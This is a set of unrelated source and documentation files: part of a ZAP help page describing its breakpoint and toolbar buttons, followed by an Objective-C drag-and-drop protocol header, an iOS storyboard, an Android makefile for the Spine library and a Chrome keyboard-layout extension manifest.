separates ones for requests and responses via the <a href="dialogs/options/breakpoints.html">Options breakpoints screen</a> <h2><img src="../images/16/143.png" align="bottom" width="16" height="16" />&nbsp; Step</h2> This allows the trapped request or response to continue to the application or your browser with any changes that you have made to it.<br/> The 'global' <a href="../start/concepts/breakpoints.html">break point</a> will remain set so that the next request or response will also be caught.<br/> This button is only enabled when a request or response is trapped. <h2><img src="../images/16/131.png" align="bottom" width="16" height="16" />&nbsp; Continue</h2> The 'global' <a href="../start/concepts/breakpoints.html">break point</a> will be unset so that subsequent requests and responses will no longer be caught by ZAP unless you have set break points on specific URLs.<br/> This button is only enabled when a request or response is trapped. <h2><img src="../images/16/150.png" align="bottom" width="16" height="16" />&nbsp; Drop</h2> This drops the trapped request or response so that it is not passed on to the application or your browser.<br/> This button is only enabled when a request or response is trapped. <h2><img src="../images/16/break_add.png" align="bottom" width="16" height="16" />&nbsp; Add a custom HTTP break point</h2> This displays the <a href="dialogs/addbreak.html">Add break point</a> dialog which allows you to specify the criteria for a <a href="../start/concepts/breakpoints.html">break point</a>. <h2><img src="../images/fugue/equalizer.png" align="bottom" width="16" height="16" />&nbsp; Scan Policy Manager...</h2> Shows the <a href="dialogs/scanpolicymgr.html">Scan Policy Manager</a> dialog which allows configuration of <a href="../start/concepts/scanpolicy.html">scan policies</a>. <h2><img src="../images/fugue/block.png" align="bottom" width="16" height="16" />&nbsp; Manage Add-ons</h2> This shows the <a href="dialogs/manageaddons.html">Manage Add-ons</a> dialog which allows you to discover, install and update add-ons from the online marketplace.<br/> It also allows you to uninstall add-ons. <h2><img src="../images/fugue/forcedUserOff.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp; <img src="../images/fugue/forcedUserOn.png" align="bottom" width="16" height="16" />&nbsp; Forced User Mode On / Off</h2> This switches forced user mode on and off.<br/> The button is only enabled when you have defined a forced user for at least one <a href="../start/concepts/contexts.html">context</a>, which can be done via the <a href="dialogs/session/contexts.html">Session Contexts</a> dialog. <p> Note that <a href="../start/concepts/addons.html">add-ons</a> can add additional buttons. </p> <h2>See also</h2> &nbsp;&nbsp;&nbsp;&nbsp;<a href="overview.html">The user interface overview</a><br/> <table> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;</td><td> <a href="../start/start.html">Getting Started</a></td><td>for details of how to start using ZAP</td></tr> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;</td><td> <a href="dialogs/dialogs.html">Dialogs</a></td><td>for details of the dialogs or popups </td></tr> <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;</td><td> <a href="../intro.html">Introduction</a></td><td>the introduction to ZAP</td></tr> </table> </body> </html>
{ "pile_set_name": "Github" }
// // Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard. // #import "NSObject-Protocol.h" @protocol NSDraggingInfo; @protocol NSDraggingDestination <NSObject> @optional - (void)updateDraggingItemsForDrag:(id <NSDraggingInfo>)arg1; - (BOOL)wantsPeriodicDraggingUpdates; - (void)draggingEnded:(id <NSDraggingInfo>)arg1; - (void)concludeDragOperation:(id <NSDraggingInfo>)arg1; - (BOOL)performDragOperation:(id <NSDraggingInfo>)arg1; - (BOOL)prepareForDragOperation:(id <NSDraggingInfo>)arg1; - (void)draggingExited:(id <NSDraggingInfo>)arg1; - (unsigned long long)draggingUpdated:(id <NSDraggingInfo>)arg1; - (unsigned long long)draggingEntered:(id <NSDraggingInfo>)arg1; @end
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8" standalone="no"?> <document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="8150" systemVersion="15A204g" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" initialViewController="01J-lp-oVM"> <dependencies> <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="8122"/> </dependencies> <scenes> <!--View Controller--> <scene sceneID="EHf-IW-A2E"> <objects> <viewController id="01J-lp-oVM" sceneMemberID="viewController"> <layoutGuides> <viewControllerLayoutGuide type="top" id="Llm-lL-Icb"/> <viewControllerLayoutGuide type="bottom" id="xb3-aO-Qok"/> </layoutGuides> <view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3"> <rect key="frame" x="0.0" y="0.0" width="600" height="600"/> <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/> <animations/> <color key="backgroundColor" white="1" alpha="1" colorSpace="custom" customColorSpace="calibratedWhite"/> </view> </viewController> <placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/> </objects> <point key="canvasLocation" x="53" y="375"/> </scene> </scenes> </document>
{ "pile_set_name": "Github" }
LOCAL_PATH := $(call my-dir) include $(CLEAR_VARS) LOCAL_MODULE := spine_static LOCAL_MODULE_FILENAME := libspine LOCAL_SRC_FILES := Animation.cpp \ AnimationState.cpp \ AnimationStateData.cpp \ Atlas.cpp \ AtlasAttachmentLoader.cpp \ Attachment.cpp \ AttachmentLoader.cpp \ Bone.cpp \ BoneData.cpp \ CCSkeleton.cpp \ CCSkeletonAnimation.cpp \ Json.cpp \ RegionAttachment.cpp \ Skeleton.cpp \ SkeletonData.cpp \ SkeletonJson.cpp \ Skin.cpp \ Slot.cpp \ SlotData.cpp \ BoundingBoxAttachment.cpp \ Event.cpp \ EventData.cpp \ SkeletonBounds.cpp \ extension.cpp \ spine-cocos2dx.cpp LOCAL_EXPORT_C_INCLUDES := $(LOCAL_PATH)/.. LOCAL_C_INCLUDES := $(LOCAL_PATH)/../.. \ $(LOCAL_PATH)/.. LOCAL_WHOLE_STATIC_LIBRARIES := cocos2dx_static include $(BUILD_STATIC_LIBRARY) $(call import-module,.)
{ "pile_set_name": "Github" }
/* Copyright 2014 Google Inc. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ { "name": "Russian Phonetic Dvorak", "version": "1.0", "manifest_version": 2, "description": "Russian Phonetic Dvorak keyboard", "permissions": [ "input" ], "input_components": [ { "name": "Russian Phonetic Dvorak", "type": "ime", "id": "ru_phonetic_dvorak_xkb", "description": "Russian Phonetic Dvorak keyboard", // user visible description "language": "ru", // The primary language this IME is used for "layouts": ["pl(ru_phonetic_dvorak)"] } ] }
{ "pile_set_name": "Github" }